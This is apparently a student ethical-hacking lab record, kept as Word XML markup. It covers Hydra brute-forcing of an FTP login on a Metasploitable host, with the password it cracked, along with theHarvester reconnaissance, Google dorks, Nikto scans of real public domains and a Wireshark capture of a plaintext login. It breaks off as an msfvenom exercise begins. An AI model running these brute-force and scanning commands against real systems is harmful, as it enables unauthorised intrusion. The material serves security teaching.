    <w:p w14:paraId="37A1186C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Host discovery was performed using ping scan, ARP scan, and the skip-discovery option, confirming that the target host was reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A32B6BC" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4699196C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14: Cracking the Password Using Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7116E1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5F879CFD" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To demonstrate brute-force login testing on an FTP service using Hydra with username and password wordlists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709E7B6F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0AF2564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Hydra from Applications → Password Attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE391B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Identify the target: FTP service on 192.168.1.101 (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5A09B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Prepare username and password wordlists from /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F33DBCC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hydra -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>user_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -P </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pass_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ftp://192.168.1.101 -V</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5383CFA4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Observe the verbose output and note the valid credential pair reported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C198B4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24FA9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BE7DD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hydra -l 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/share/wordlists/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metasploit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/user -P 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/share/wordlists/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metasploit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/passwords ftp://192.168.1.101 -V</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BCAE52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Hydra v9.5 (c) 2023 by van Hauser/THC - for legal purposes only</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C5C7D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[DATA] max 16 tasks per 1 server,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overall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16 tasks</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B8F245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[DATA] attacking ftp://192.168.1.101:21/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D721D2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[ATTEMPT] target 192.168.1.101 - login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msfadmin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 - pass "abc123"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DD4812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[ATTEMPT] target 192.168.1.101 - login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msfadmin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 - pass "test"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C6CCE3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[ATTEMPT] target 192.168.1.101 - login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msfadmin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 - pass "batman"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="252F6A7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21][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ftp] host: 192.168.1.101   login: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msfadmin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password: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msfadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="271465D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 of 1 target successfully completed, 1 valid password found</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5492F62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Hydra finished at 2026-08-03 10:41:07</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B9ACFB3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Hydra was used to brute-force the FTP login on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> target; supplying wordlists and reading the verbose attempt log was demonstrated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1EE02B" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="648A98CD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 xml:space="preserve">Experiment 15: Information Gathering Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>theHarvester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3414DFBE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1FD84BC0" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To passively gather subdomains, IP ranges, and email addresses for a target domain using public sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DEC26A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47D54927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5C64458B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Choose a target domain, e.g. www.zoho.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCCC05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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>theHarvester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -d www.zoho.com -l 300 -b all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FA763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Allow the tool to query each source (some show 'Missing API key' — expected).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D96A5F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Review the ASNs, IP addresses, and URLs returned in the summary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776A3AEA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15D82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6324B5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theHarvester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-d www.zoho.com -l 300 -b all</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13841DC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theHarvester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4.4.3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E7735F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[*] Target: www.zoho.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E5DC99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[*] Searching Bing.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F0BEB5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[*] Searching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CertSpotter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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0751478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[!] Missing API key for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SecurityTrails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(skipping this source)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54309E9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[*] Searching crt.sh.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6840DD5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[*] Emails found: 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B77842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[*] Hosts found: 27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5315C58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mail.zoho.com:198.18.5.20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="054895F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docs.zoho.com:198.18.5.44</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CAD826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crm.zoho.com:198.18.5.61</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3770EF0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[*] ASNS found: 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="028DD2A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AS28349</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FFBDF79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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TheHarvester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was run against a target domain and successfully returned ASNs, IP addresses, and public URLs gathered from open sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB8E134" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA43CDD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16: Use Google and Who.is for Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BFD43B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683DD5A4" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To perform passive reconnaissance on a domain using Google </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dorking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and a WHOIS lookup, including DNS records and network diagnostics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2739D83C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71293F9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browser and use Google search operators (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>site:,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filetype:,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> intitle:) against the target domain to locate indexed pages and file types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5679CD9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browser and go to the who.is website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CFE641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Enter the target domain, e.g. www.saveetha.com.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C11664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the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Whois</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tab for registrar, dates, and name servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2584DEC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Check the DNS Records tab for A, MX, and NS records, and the Diagnostics tab for ping and traceroute results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756474ED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1CEF2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E69E1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Google dork examples used:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F4C7550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site:saveetha.com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filetype:pdf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="033D2913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site:saveetha.com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intitle:"index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of"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C5D7B6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954969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who.is - WHOIS Lookup, DNS Records, Diagnostics</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D21B36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-----------------------------------------------</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60EBADF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Domain Name: SAVEETHA.COM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C7D9DC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Registrar: GoDaddy.com, LLC</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A1A5B8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Creation Date: 2001-03-14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3035C5B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Registry Expiry Date: 2027-03-14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19EE295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Name Server: NS1.SAVEETHA.COM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60B4A2C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Name Server: NS2.SAVEETHA.COM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CD4B02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-----------------------------------------------</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5676096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DNS Records:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09529FD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     www.saveetha.com    103.21.58.10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41CAA72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MX    saveetha.com        mail.saveetha.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="167BC89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-----------------------------------------------</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25CBADB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Diagnostics: ping / traceroute to saveetha.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11D3087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Reply from 103.21.58.10: bytes=32 time=18ms TTL=54</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67F77FC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Reply from 103.21.58.10: bytes=32 time=21ms TTL=54</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CD9D582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Google </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dorking</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> surfaced indexed files and pages for the domain, and a WHOIS lookup returned registrar information, DNS records, and network diagnostics, together giving a passive reconnaissance snapshot of the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE09B3D" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B06A26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 xml:space="preserve">Experiment 17: Windows OS Commands Execution (traceroute, ping, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, netstat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E4F85D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3F18E958" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To use built-in Windows command-line utilities (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ping, ipconfig, netstat) for basic network diagnosis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BC9B7A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13A56E3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the Windows command prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C82E89C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tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> www.saveetha.com to view the route taken (Windows equivalent of traceroute).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55228954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 ping &lt;IP address&gt; to check reachability and round-trip time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FB417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ipconfig to view local interface configuration (Windows equivalent of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0C60C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Run netstat to list active TCP connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E9A29C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1B75E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101F3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C:\Users\Student&gt;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tracert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www.saveetha.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A8AC4C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Tracing route to www.saveetha.com [103.21.58.10]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78AB851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1     2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1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1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192.168.1.1</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="671DC72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2    12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10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11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10.10.0.1</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="7C6E107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3    24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22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23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103.21.58.10</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="257B65C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Trace complete.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09FC392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C:\Users\Student&gt; ping 192.168.1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C29F11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Reply from 192.168.1.1: bytes=32 time&lt;1ms TTL=64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60133B0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Reply from 192.168.1.1: bytes=32 time&lt;1ms TTL=64</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CCD3BE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Packets: Sent = 4, Received = 4, Lost = 0 (0% loss)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4881345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C:\Users\Student&gt; ipconfig</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FC1B26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IPv4 Address. . . . . .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 . . .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192.168.1.15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64E5766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Subnet Mask . . . . . .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 . . .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. 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255.255.255.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51FD141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C:\Users\Student&gt; netstat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74F927D9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Proto  Local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Address          Foreign Address        State</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="157A9A1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    192.168.1.15:54212     103.21.58.10:443       ESTABLISHED</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1444F6B8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tracert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ping, ipconfig, and netstat commands were run and used to check the route to a target, reachability, local configuration, and active connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B9BC26" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5473C656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 xml:space="preserve">Experiment 18: Vulnerabilities Analysis Using CGI Scanning with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="788CA47C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468F21AE" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To scan a web server for outdated software, missing security headers, and common misconfigurations using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nikto's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> CGI-directory scanning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0BFB21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72AE28E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Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E64394E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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h www.zoho.com -Tuning x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F723E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Review findings such as missing security headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75292217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Run: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h www.certifiedhacker.com -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cgidirs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> all</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460DD001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Note the server banner, port, and any flagged CGI directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF195C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1A84A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AA2FE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nikto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-h www.zoho.com -Tuning x</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="501BC59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Nikto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v2.5.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5478DB9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Target IP:      52.39.13.11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B8E367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Target Hostname: www.zoho.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59CBFC3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Target Port:     80</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0197E8C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Server: nginx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BC909F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Missing X-Frame-Options header</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A90C22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Missing X-Content-Type-Options header</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E75C4B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Missing X-XSS-Protection header</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="570852D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+ 7 host(s) tested</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="755E919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80524E1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nikto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-h www.certifiedhacker.com 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Cgidirs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all</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0864947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Target Port:     80</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15A18DE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cgi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-bin/ directory found (possible admin interface)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71CE830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+ Scan terminated: 12 error(s) and 9 item(s) reported</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E5E3864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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used to scan two web servers and reported missing security headers and CGI-directory findings worth further review.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA6585A" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9850A3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19: Wireshark Sniffer for Network Traffic and Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5A2BD2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474FF061" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To capture live network traffic with Wireshark and inspect an HTTP login request to observe unencrypted credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C591F4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167D19E1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Wireshark and select the Wi-Fi interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58569737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Start the capture and log in to a test website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF407F4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Apply the display filter: http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E1CF7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Stop the capture once the login request is seen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E1E2EC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Locate the HTTP POST request and inspect the submitted credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CB62E2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6A627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9D483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Wireshark - Capturing on Wi-Fi   |   Display filter: http</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EE7AD0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No.  Time    Source           Destination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Protocol  Length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Info</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38E60A50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142  3.201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192.168.1.15     198.18.5.20      HTTP      512     POST /login HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C2662F2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143  3.204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198.18.5.20      192.168.1.15     HTTP      248     HTTP/1.1 302 Found</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17AECD7C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144  3.250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192.168.1.15     198.18.5.20      HTTP      331     GET /dashboard HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="280DD35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572249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Hypertext Transfer Protocol</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76F1DF0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Content-Type: application/x-www-form-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urlencoded</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="3807437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Form item: "username" =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testuser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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09B4711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Form item: "password" = "test1234"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EDD46DF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Live network traffic was captured with Wireshark, filtered to HTTP, and inspected to show how unencrypted login data is visible in a packet capture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F4CB80" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2FDC51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20: Implement the Boot Sector Virus Concept (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>msfvenom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1A240212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72701CB7" w14:textId="77777777" w:rsidR="00A04CDF" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To explore </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>msfvenom's</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload listing and configuration options as part of understanding Metasploit payload structure, generation syntax, and delivery concepts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520A90D1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7A6270F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Update the system and resolve any Bundler errors in the Metasploit framework directory.</w:t>
      </w:r>
    </w:p>
